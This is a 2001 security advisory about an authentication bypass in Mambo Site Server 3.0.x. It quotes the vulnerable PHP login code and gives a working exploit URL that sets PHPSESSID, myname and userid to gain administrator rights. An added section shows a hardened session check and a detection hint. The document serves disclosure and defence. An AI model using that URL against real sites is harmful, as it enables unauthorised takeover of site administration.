
mambo_advisorie.txt
Posted Jul 26, 2001
Site reverseonline.com

The Mambo Site Server v3.0.0 - 3.0.5 contains a vulnerability which allows users to gain administrative privileges by changing global variables via URL parsing.

tags | exploit
SHA-256 | 130f26d521cff30052559a9d02cc0b8dd1f05866aefac6e2932959bd6a3d136d

Serious security hole in Mambo Site Server version 3.0.X
Jul 24, 2001
by: Ismael Peinado Palomo - postmaster@reverseonline.com
www.reverseonline.com

Summary
Mambo Site Server is a dynamic portal engine and content management tool
based on PHP and MySQL.

Details
Vulnerable systems:
Mambo Site Server version 3.0.0 - 3.0.5

Immune systems:

Impact:
Any user can gain administrator privileges.

Exploits:

Under the 'administrator/' directory we found that index.php checks the user and password:

if (isset($submit)){
    $query = "SELECT id, password, name FROM users WHERE username='$myname' AND (usertype='administrator' OR usertype='superadministrator')";
    $result = $database->openConnectionWithReturn($query);
    if (mysql_num_rows($result)!= 0){
        list($userid, $dbpass, $fullname) = mysql_fetch_array($result);

.....

        if (strcmp($dbpass,$pass)) {
            //if the password entered does not match the database record ask user to login again
            print "<SCRIPT>alert('Incorrect Username and Password, please try again'); document.location.href='index.php';</SCRIPT>\n";
        }else {
            //if the password matches the database
            if ($remember!="on"){
                //if the user does not want the password remembered and the cookie is set, delete the cookie
                if ($passwordcookie!=""){
                    setcookie("passwordcookie");
                    $passwordcookie="";
                }
            }
            //set up the admin session then take the user into the admin section of the site
            session_register("myname");
            session_register("fullname");
            session_register("userid");
            print "<SCRIPT>window.open('index2.php','newwindow');</SCRIPT>\n";
            print "<SCRIPT>document.location.href='$live_site'</SCRIPT>\n";

        }
    }else {
        print "<SCRIPT>alert('Incorrect Username and Password, please try again'); document.location.href='index.php';</SCRIPT>\n";
    }

As we can see, if the password for the administrator matches the one in the database, some variables are registered in the session and we are redirected to index2.php... so let's take a look at index2.php:

if (!$PHPSESSID){
    print "<SCRIPT>document.location.href='index.php'</SCRIPT>\n";
    exit(0);
}
else {
    session_start();
    if (!$myname) session_register("myname");
    if (!$fullname) session_register("fullname");
    if (!$uid) session_register("userid");
}

Here we can see that the only verification of a valid user is through the global variable PHPSESSID, so if we declare that variable on the URL and set 'myname', 'fullname' and 'userid', we can gain administrative control... so we'll test:

http://target.machine/administrator/index2.php?PHPSESSID=1&myname=admin&fullname=admin&userid=administrator

BINGO!! Now we have full administrative privileges... that's a typical example of PHP hacking... it's clear that security can't rely on global variables since they may be modified through URL parsing.
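The index2.php check quoted above, shown beside a corrected version. This is an added example written for this page, not code from the advisory or from Mambo; the function names, the $_SESSION keys and the forged request array are assumptions chosen for illustration. With register_globals on, every variable the check reads can be supplied by the request, so the "authentication" only tests whether the client chose to send those parameters; the hardened form reads nothing but server-side session state written by the login handler.

```php
<?php
// Added example (not from the original advisory or from Mambo).
// Names and $_SESSION keys below are assumptions for illustration.

// Vulnerable pattern, as in the advisory's index2.php under register_globals=On:
// $PHPSESSID, $myname, $fullname and $userid can all arrive from the query
// string, and session_register() then exports those request-supplied values
// into the session as if the login handler had set them.
function admin_check_vulnerable(array $globals): bool
{
    if (empty($globals['PHPSESSID'])) {
        return false;              // the original redirects to index.php here
    }
    // Equivalent to the session_register() calls: whatever the request sent
    // is now treated as the logged-in administrator.
    return isset($globals['myname'], $globals['userid']);
}

// Hardened pattern: index2.php trusts only what the login handler stored in
// $_SESSION after a successful password check; $_GET/$_POST are never read.
function admin_check_hardened(): bool
{
    if (session_status() !== PHP_SESSION_ACTIVE) {
        session_start();
    }
    return isset($_SESSION['admin_userid'], $_SESSION['admin_usertype'])
        && in_array($_SESSION['admin_usertype'],
                    ['administrator', 'superadministrator'], true);
}

// What index.php should do instead of session_register() once strcmp()
// succeeds: rotate the session id so a client-chosen ?PHPSESSID= value is
// never kept, then record the authenticated identity server-side.
function admin_login_success(int $userid, string $username, string $usertype): void
{
    if (session_status() !== PHP_SESSION_ACTIVE) {
        session_start();
    }
    session_regenerate_id(true);
    $_SESSION['admin_userid']   = $userid;
    $_SESSION['admin_username'] = $username;
    $_SESSION['admin_usertype'] = $usertype;
}

// Constructed request mirroring the advisory's URL (not real traffic).
$forged = [
    'PHPSESSID' => '1',
    'myname'    => 'admin',
    'fullname'  => 'admin',
    'userid'    => 'administrator',
];

// The vulnerable check accepts the forged parameters; the hardened check,
// with no login having run in this session, rejects them.
var_dump(admin_check_vulnerable($forged));
var_dump(admin_check_hardened());
```

The detection angle follows from the same observation: a request to administrator/index2.php that carries PHPSESSID, myname or userid in the query string is not something the legitimate login flow ever produces, so such requests are worth alerting on in web server logs while the code is being fixed.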

Ismael Peinado Palomo
Chief R&D Engineer
postmaster@reverseonline.com
www.reverseonline.com